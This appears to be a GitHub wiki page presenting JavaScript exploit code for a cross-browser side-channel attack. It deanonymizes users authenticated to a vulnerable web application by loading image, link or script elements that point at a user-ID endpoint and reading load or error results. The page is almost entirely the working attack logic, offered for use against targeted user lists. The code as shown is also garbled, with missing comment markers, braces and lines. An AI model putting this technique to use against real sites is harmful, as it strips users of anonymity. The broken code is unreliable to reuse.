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A Cross browser Exploit to Deanonymize Web Users

Ahmed Elsobky edited this page Nov 8, 2017 · 9 revisions


This is an exploit code that's capable of deanonymizing web users authenticated to a given vulnerable modern web application in a cross-browser manner. For more details, see:

Exploit code:

 * Deanonymize a predefined group of users, given sufficient arguments.
 * @param attackMethod {string}, the method of the attack (either 'redirection' or 'statusCode').
 * @param endpoint {string}, the vulnerable endpoint with the user ID parameter last.
 * @param idList {array}, a list of the targeted users' IDs.
 * @param callback {function}, a callback function to pass all results to.
 * @return {array}, an ordered output array with boolean values.
function deanonymize(attackMethod, endpoint, idList, callback) {
    var elNodes, testFn;
    var output = [];
    // Register a new cross-browser event listener.
    var addListener = (function() {
        return (window.addEventListener) ? window.addEventListener :
            // For IE8 and earlier versions support.
            function (evName, callback) {
                this.attachEvent('on' + evName, callback);
     * Create new DOM elements.
     * @param tagName {string}, elements' tag name.
     * @return {array}, an array of DOM nodes.
    var createElements = function(tagName) {
        var i, l, el;
        var elNodes = [];
        for (i = 0, l = idList.length; i < l; i++) {
            el = document.createElement(tagName);
            if (tagName !== 'link') {
                el.src = endpoint + idList[i];
            } else {
                el.href = endpoint + idList[i];
                el.rel = 'stylesheet';
            if (tagName !== 'img') {
                el.onerror = function() {
        return elNodes;
     * Conduct tests in regard to a given function.
     * @param testFn {function}, a test function.
     * @return void.
    var assess = function(testFn) {
        var i, l;
        for (i = 0, l = elNodes.length; i < l; i++) {
            if (testFn(elNodes[i])) {
            } else {
    if (attackMethod === 'redirection') {
        elNodes = createElements('img');
         * Test if an image node was loaded or not.
         * @param imageNode {object}, a DOM image node.
         * @return {boolean}.
        testFn = function(imgNode) {
            if (imgNode.naturalHeight !== 0 && imgNode.naturalWidth !== 0) {
                return true;
            return false;
    } else if(attackMethod === 'statusCode') {
        elNodes = (/chrome/i.test(navigator.userAgent)) ? createElements('link') :
         * Test if a given element is a child of `documentElement` or not.
         * @param el {object}, a DOM element.
         * @return {boolean}.
        testFn = function(el) {
            if (el.parentNode !== document.documentElement) {
                return true;
            return false;
    }, 'load', function() { assess(testFn); });